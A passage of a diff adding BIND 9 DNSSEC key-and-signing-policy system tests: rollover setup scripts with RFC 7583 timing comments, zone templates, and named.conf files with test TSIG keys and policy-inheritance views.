ZSK: Tpub(N+1) <= Tact(N) + Lzsk - Ipub +# IpubC = DprpC + TTLkey (+publish-safety) +# Ipub = IpubC +# Lcsk = Lksk = Lzsk +# +# Lcsk: 6mo (186d, 4464h) +# Dreg: N/A +# DprpC: 1h +# TTLkey: 1h +# publish-safety: 1h +# Ipub: 3h +# +# Tact(N) = Tnow - Lcsk + Ipub = now - 186d + 3h +# = now - 4464h + 3h = now - 4461h +TactN="now-4461h" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN}" +CSK=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN -z $O $TactN "$CSK" > settime.out.$zone.1 2>&1 +cat template.db.in "${CSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 3: +# It is time to submit the DS and to roll signatures. +setup step3.csk-roll2.autosign +# According to RFC 7583: +# +# Tsbm(N+1) >= Trdy(N+1) +# KSK: Tact(N+1) = Tsbm(N+1) +# ZSK: Tact(N+1) = Tpub(N+1) + Ipub = Tsbm(N+1) +# KSK: Iret = DprpP + TTLds (+retire-safety) +# ZSK: IretZ = Dsgn + Dprp + TTLsig (+retire-safety) +# +# Lcsk: 186d +# Dprp: 1h +# DprpP: 1w +# Dreg: N/A +# Dsgn: 12h +# TTLds: 1h +# TTLsig: 1d +# retire-safety: 1h +# Iret: 170h +# IretZ: 38h +# Ipub: 3h +# +# Tact(N) = Tnow - Lcsk = now - 186d +# Tret(N) = now +# Trem(N) = Tnow + Iret = now + 170h +# Tpub(N+1) = Tnow - Ipub = now - 3h +# Tsbm(N+1) = Tret(N) +# Tact(N+1) = Tret(N) +# Tret(N+1) = Tnow + Lcsk = now + 186d +# Trem(N+1) = Tnow + Lcsk + Iret = now + 186d + 170h = +# = now + 4464h + 170h = now + 4634h +TactN="now-186d" +TretN="now" +TremN="now+170h" +TpubN1="now-3h" +TsbmN1="${TretN}" +TactN1="${TretN}" +TretN1="now+186d" +TremN1="now+4634h" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +CSK1=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -d $O $TactN -z $O $TactN "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $R $TpubN1 -r $R $TpubN1 -d $H $TpubN1 -z $H $TpubN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Set key rollover relationship. +key_successor $CSK1 $CSK2 +# Sign zone. +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 4: +# Some time later all the ZRRSIG records should be from the new CSK, and the +# DS should be swapped. The ZRRSIG records are all replaced after IretZ (38h). +# The DS is swapped after Dreg + Iret (1w3h). In other words, the zone +# signatures are replaced before the DS is swapped. +setup step4.csk-roll2.autosign +# According to RFC 7583: +# Trem(N) = Tret(N) + IretZ +# +# Lcsk: 186d +# Dreg: N/A +# Iret: 170h +# IretZ: 38h +# +# Tact(N) = Tnow - IretZ = Lcsk = now - 38h - 186d +# = now - 38h - 4464h = now - 4502h +# Tret(N) = Tnow - IretZ = now - 38h +# Trem(N) = Tnow - IretZ + Iret = now - 38h + 170h = now + 132h +# Tpub(N+1) = Tnow - IretZ - IpubC = now - 38h - 3h = now - 41h +# Tsbm(N+1) = Tret(N) +# Tact(N+1) = Tret(N) +# Tret(N+1) = Tnow - IretZ + Lcsk = now - 38h + 186d +# = now + 4426h +# Trem(N+1) = Tnow - IretZ + Lcsk + Iret +# = now + 4426h + 3h = now + 4429h +TactN="now-4502h" +TretN="now-38h" +TremN="now+132h" +TpubN1="now-41h" +TsbmN1="${TretN}" +TactN1="${TretN}" +TretN1="now+4426h" +TremN1="now+4429h" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +CSK1=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -z $U $TretN -d $U $TsbmN1 -D ds $TsbmN1 "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TsbmN1 -r $O $TsbmN1 -z $R $TactN1 -d $R $TsbmN1 -P ds $TsbmN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Set key rollover relationship. +key_successor $CSK1 $CSK2 +# Sign zone. +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 5: +# Some time later the DS can be swapped and the old DNSKEY can be removed from +# the zone. +setup step5.csk-roll2.autosign +# Subtract Iret (170h) - IretZ (38h) = 132h. +# +# Tact(N) = now - 4502h - 132h = now - 4634h +# Tret(N) = now - 38h - 132h = now - 170h +# Trem(N) = now + 132h - 132h = now +# Tpub(N+1) = now - 41h - 132h = now - 173h +# Tsbm(N+1) = Tret(N) +# Tact(N+1) = Tret(N) +# Tret(N+1) = now + 4426h - 132h = now + 4294h +# Trem(N+1) = now + 4492h - 132h = now + 4360h +TactN="now-4634h" +TretN="now-170h" +TremN="now" +TpubN1="now-173h" +TsbmN1="${TretN}" +TactN1="${TretN}" +TretN1="now+4294h" +TremN1="now+4360h" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +CSK1=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -z $H now-133h -d $U $TsbmN1 -D ds $TsbmN1 "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TsbmN1 -r $O $TsbmN1 -z $O now-133h -d $R $TsbmN1 -P ds $TsbmN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Set key rollover relationship. +key_successor $CSK1 $CSK2 +# Sign zone. +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 6: +# Some time later the predecessor DNSKEY enters the HIDDEN state. +setup step6.csk-roll2.autosign +# Subtract DNSKEY TTL plus zone propagation delay (2h). +# +# Tact(N) = now - 4634h - 2h = now - 4636h +# Tret(N) = now - 170h - 2h = now - 172h +# Trem(N) = now - 2h +# Tpub(N+1) = now - 173h - 2h = now - 175h +# Tsbm(N+1) = Tret(N) +# Tact(N+1) = Tret(N) +# Tret(N+1) = now + 4294h - 2h = now + 4292h +# Trem(N+1) = now + 4360h - 2h = now + 4358h +TactN="now-4636h" +TretN="now-172h" +TremN="now-2h" +TpubN1="now-175h" +TsbmN1="${TretN}" +TactN1="${TretN}" +TretN1="now+4292h" +TremN1="now+4358h" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +CSK1=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $U $TremN -r $U $TremN -d $H $TremN -z $H now-135h "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TsbmN1 -r $O $TsbmN1 -d $O $TremN -z $O now-135h "$CSK2" > settime.out.$zone.2 2>&1 +# Set key rollover relationship. +key_successor $CSK1 $CSK2 +# Sign zone. +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 7: +# The predecessor DNSKEY can be purged, but purge-keys is disabled. +setup step7.csk-roll2.autosign +# Subtract 90 days (default, 2160h) from all the times. +# Tact(N) = now - 4636h - 2160h = now - 6796h +# Tret(N) = now - 172h - 2160h = now - 2332h +# Trem(N) = now - 2h - 2160h = now - 2162h +# Tpub(N+1) = now - 175h - 2160h = now - 2335h +# Tsbm(N+1) = Tret(N) +# Tact(N+1) = Tret(N) +# Tret(N+1) = now + 4294h - 2160h = now + 2134h +# Trem(N+1) = now + 4360h - 2160h = now + 2200h +TactN="now-6796h" +TretN="now-2332h" +TremN="now-2162h" +TpubN1="now-2335h" +TsbmN1="${TretN}" +TactN1="${TretN}" +TretN1="now+2134h" +TremN1="now+2200h" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +CSK1=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $U $TremN -r $U $TremN -d $H $TremN -z $H now-135h "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TsbmN1 -r $O $TsbmN1 -d $O $TremN -z $O now-135h "$CSK2" > settime.out.$zone.2 2>&1 +# Set key rollover relationship. +key_successor $CSK1 $CSK2 +# Sign zone. +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Test #2375, the "three is a crowd" bug, where a new key is introduced but the +# previous rollover has not finished yet. In other words, we have a key KEY2 +# that is the successor of key KEY1, and we introduce a new key KEY3 that is +# the successor of key KEY2: +# +# KEY1 < KEY2 < KEY3. +# +# The expected behavior is that all three keys remain in the zone, and not +# the bug behavior where KEY2 is removed and immediately replaced with KEY3. +# +# Set up a zone that has a KSK (KEY1) and have the successor key (KEY2) +# published as well. +setup three-is-a-crowd.kasp +# These times are the same as step3.ksk-doubleksk.autosign. +TactN="now-60d" +TretN="now" +TremN="now+50h" +TpubN1="now-27h" +TsbmN1="now" +TactN1="${TretN}" +TretN1="now+60d" +TremN1="now+1490h" +ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -A ${TactN1} -P sync ${TsbmN1} -I ${TretN1} -D ${TremN1}" +zsktimes="-P ${TactN} -A ${TactN}" +KSK1=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +KSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $newtimes $zone 2> keygen.out.$zone.2) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $zsktimes $zone 2> keygen.out.$zone.3) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -d $O $TactN "$KSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $R $TpubN1 -r $R $TpubN1 -d $H $TpubN1 "$KSK2" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $O $TactN -z $O $TactN "$ZSK" > settime.out.$zone.3 2>&1 +# Set key rollover relationship. +key_successor $KSK1 $KSK2 +# Sign zone. +cat template.db.in "${KSK1}.key" "${KSK2}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK2" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 diff --git a/bin/tests/system/kasp/ns3/template.db.in b/bin/tests/system/kasp/ns3/template.db.in new file mode 100644 index 0000000..010b05b --- /dev/null +++ b/bin/tests/system/kasp/ns3/template.db.in @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns3 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 + diff --git a/bin/tests/system/kasp/ns3/template2.db.in b/bin/tests/system/kasp/ns3/template2.db.in new file mode 100644 index 0000000..7b94ace --- /dev/null +++ b/bin/tests/system/kasp/ns3/template2.db.in @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 2 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns3 +ns3 A 10.53.0.3 + +a A 10.0.0.11 +b A 10.0.0.22 +c A 10.0.0.33 +d A 10.0.0.44 diff --git a/bin/tests/system/kasp/ns4/example1.db.in b/bin/tests/system/kasp/ns4/example1.db.in new file mode 100644 index 0000000..c9e537f --- /dev/null +++ b/bin/tests/system/kasp/ns4/example1.db.in @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns4 +ns4 A 10.53.0.4 + +view TXT "view1" diff --git a/bin/tests/system/kasp/ns4/example2.db.in b/bin/tests/system/kasp/ns4/example2.db.in new file mode 100644 index 0000000..c1f16a2 --- /dev/null +++ b/bin/tests/system/kasp/ns4/example2.db.in @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns4 +ns4 A 10.53.0.4 + +view TXT "view2" diff --git a/bin/tests/system/kasp/ns4/named.conf.in b/bin/tests/system/kasp/ns4/named.conf.in new file mode 100644 index 0000000..fff45ab --- /dev/null +++ b/bin/tests/system/kasp/ns4/named.conf.in @@ -0,0 +1,176 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS4 + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +key "sha1" { + algorithm "hmac-sha1"; + secret "FrSt77yPTFx6hTs4i2tKLB9LmE0="; +}; + +key "sha224" { + algorithm "hmac-sha224"; + secret "hXfwwwiag2QGqblopofai9NuW28q/1rH4CaTnA=="; +}; + +key "sha256" { + algorithm "hmac-sha256"; + secret "R16NojROxtxH/xbDl//ehDsHm5DjWTQ2YXV+hGC2iBY="; +}; + +key "keyforview1" { + algorithm @DEFAULT_HMAC@; + secret "YPfMoAk6h+3iN8MDRQC004iSNHY="; +}; + +key "keyforview2" { + algorithm @DEFAULT_HMAC@; + secret "4xILSZQnuO1UKubXHkYUsvBRPu8="; +}; + +key "keyforview3" { + algorithm @DEFAULT_HMAC@; + secret "C1Azf+gGPMmxrUg/WQINP6eV9Y0="; +}; + +dnssec-policy "test" { + keys { + csk key-directory lifetime 0 algorithm 14; + }; +}; + +options { + query-source address 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion no; + dnssec-policy "test"; +}; + +view "inherit" { + match-clients { key "sha1"; }; + + /* Inherit dnssec-policy 'test' */ + zone "inherit.inherit.signed" { + type primary; + file "inherit.inherit.signed.db"; + inline-signing yes; + }; + + /* Override dnssec-policy */ + zone "override.inherit.signed" { + type primary; + file "override.inherit.signed.db"; + inline-signing yes; + dnssec-policy "default"; + }; + + /* Unset dnssec-policy */ + zone "none.inherit.signed" { + type primary; + file "none.inherit.signed.db"; + dnssec-policy "none"; + }; +}; + +view "override" { + match-clients { key "sha224"; }; + dnssec-policy "default"; + + /* Inherit dnssec-policy 'test' */ + zone "inherit.override.signed" { + type primary; + file "inherit.override.signed.db"; + inline-signing yes; + }; + + /* Override dnssec-policy */ + zone "override.override.signed" { + type primary; + file "override.override.signed.db"; + inline-signing yes; + dnssec-policy "test"; + }; + + /* Unset dnssec-policy */ + zone "none.override.signed" { + type primary; + file "none.override.signed.db"; + dnssec-policy "none"; + }; +}; + +view "none" { + match-clients { key "sha256"; }; + dnssec-policy "none"; + + /* Inherit dnssec-policy 'none' */ + zone "inherit.none.signed" { + type primary; + file "inherit.none.signed.db"; + }; + + /* Override dnssec-policy */ + zone "override.none.signed" { + type primary; + file "override.none.signed.db"; + inline-signing yes; + dnssec-policy "test"; + }; + + /* Unset dnssec-policy */ + zone "none.none.signed" { + type primary; + file "none.none.signed.db"; + dnssec-policy "none"; + }; +}; + +view "example1" { + match-clients { key "keyforview1"; }; + + allow-update { any; }; + + zone "example.net" { + type primary; + file "example1.db"; + }; +}; + +view "example2" { + match-clients { key "keyforview2"; }; + + zone "example.net" { + type primary; + file "example2.db"; + inline-signing yes; + }; +}; + +view "example3" { + match-clients { key "keyforview3"; }; + zone "example.net" { + in-view example2; + }; +}; diff --git a/bin/tests/system/kasp/ns4/setup.sh b/bin/tests/system/kasp/ns4/setup.sh new file mode 100644 index 0000000..45cb5b3 --- /dev/null +++ b/bin/tests/system/kasp/ns4/setup.sh @@ -0,0 +1,33 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +echo_i "ns4/setup.sh" + +# +# Set up zones that potentially will be initially signed. +# +for zn in inherit.inherit override.inherit none.inherit \ + inherit.override override.override none.override \ + inherit.none override.none none.none +do + zone="$zn.signed" + echo_i "setting up zone: $zone" + zonefile="${zone}.db" + cp template.db.in $zonefile +done + +cp example1.db.in example1.db +cp example2.db.in example2.db diff --git a/bin/tests/system/kasp/ns4/template.db.in b/bin/tests/system/kasp/ns4/template.db.in new file mode 100644 index 0000000..0f72e9c --- /dev/null +++ b/bin/tests/system/kasp/ns4/template.db.in @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns4 +ns4 A 10.53.0.4 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 + diff --git a/bin/tests/system/kasp/ns5/named.conf.in b/bin/tests/system/kasp/ns5/named.conf.in new file mode 100644 index 0000000..dae2405 --- /dev/null +++ b/bin/tests/system/kasp/ns5/named.conf.in @@ -0,0 +1,132 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS5 + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +key "sha1" { + algorithm "hmac-sha1"; + secret "FrSt77yPTFx6hTs4i2tKLB9LmE0="; +}; + +key "sha224" { + algorithm "hmac-sha224"; + secret "hXfwwwiag2QGqblopofai9NuW28q/1rH4CaTnA=="; +}; + +key "sha256" { + algorithm "hmac-sha256"; + secret "R16NojROxtxH/xbDl//ehDsHm5DjWTQ2YXV+hGC2iBY="; +}; + +dnssec-policy "test" { + keys { + csk key-directory lifetime 0 algorithm 14; + }; +}; + +options { + query-source address 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion no; + dnssec-policy "none"; +}; + +view "inherit" { + match-clients { key "sha1"; }; + + /* Inherit dnssec-policy 'none' */ + zone "inherit.inherit.unsigned" { + type primary; + file "inherit.inherit.unsigned.db"; + }; + + /* Override dnssec-policy */ + zone "override.inherit.unsigned" { + type primary; + file "override.inherit.unsigned.db"; + inline-signing yes; + dnssec-policy "default"; + }; + + /* Unset dnssec-policy */ + zone "none.inherit.unsigned" { + type primary; + file "none.inherit.unsigned.db"; + dnssec-policy "none"; + }; +}; + +view "override" { + match-clients { key "sha224"; }; + dnssec-policy "default"; + + /* Inherit dnssec-policy 'default' */ + zone "inherit.override.unsigned" { + type primary; + file "inherit.override.unsigned.db"; + inline-signing yes; + }; + + /* Override dnssec-policy */ + zone "override.override.unsigned" { + type primary; + file "override.override.unsigned.db"; + inline-signing yes; + dnssec-policy "test"; + }; + + /* Unset dnssec-policy */ + zone "none.override.unsigned" { + type primary; + file "none.override.unsigned.db"; + dnssec-policy "none"; + }; +}; + +view "none" { + match-clients { key "sha256"; }; + dnssec-policy "none"; + + /* Inherit dnssec-policy 'none' */ + zone "inherit.none.unsigned" { + type primary; + file "inherit.none.unsigned.db"; + }; + + /* Override dnssec-policy */ + zone "override.none.unsigned" { + type primary; + file "override.none.unsigned.db"; + inline-signing yes; + dnssec-policy "test"; + }; + + /* Unset dnssec-policy */ + zone "none.none.unsigned" { + type primary; + file "none.none.unsigned.db"; + dnssec-policy "none"; + }; +}; diff --git a/bin/tests/system/kasp/ns5/setup.sh b/bin/tests/system/kasp/ns5/setup.sh new file mode 100644 index 0000000..e51af06 --- /dev/null +++ b/bin/tests/system/kasp/ns5/setup.sh @@ -0,0 +1,30 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# shellcheck source=conf.sh +. "$SYSTEMTESTTOP/conf.sh" + +echo_i "ns5/setup.sh" + +# +# Set up zones that potentially will be initially signed. +# +for zn in inherit.inherit override.inherit none.inherit \ + inherit.override override.override none.override \ + inherit.none override.none none.none +do + zone="$zn.unsigned" + echo_i "setting up zone: $zone" + zonefile="${zone}.db" + cp template.db.in $zonefile +done diff --git a/bin/tests/system/kasp/ns5/template.db.in b/bin/tests/system/kasp/ns5/template.db.in new file mode 100644 index 0000000..6cb07a4 --- /dev/null +++ b/bin/tests/system/kasp/ns5/template.db.in @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns5 +ns5 A 10.53.0.5 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 + diff --git a/bin/tests/system/kasp/ns6/example.db.in b/bin/tests/system/kasp/ns6/example.db.in new file mode 100644 index 0000000..d6b912c --- /dev/null +++ b/bin/tests/system/kasp/ns6/example.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 1 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns6 +ns6 A 10.53.0.6 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 diff --git a/bin/tests/system/kasp/ns6/example2.db.in b/bin/tests/system/kasp/ns6/example2.db.in new file mode 100644 index 0000000..46aed9b --- /dev/null +++ b/bin/tests/system/kasp/ns6/example2.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA mname1. . ( + 2 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + + NS ns6 +ns6 A 10.53.0.6 + +a A 10.0.0.1 +b A 10.0.0.2 +c A 10.0.0.3 diff --git a/bin/tests/system/kasp/ns6/example3.db.in b/bin/tests/system/kasp/ns6/example3.db.in new file mode 100644 index 0000000..ccbd96a --- /dev/null +++ b/bin/tests/system/kasp/ns6/example3.db.in 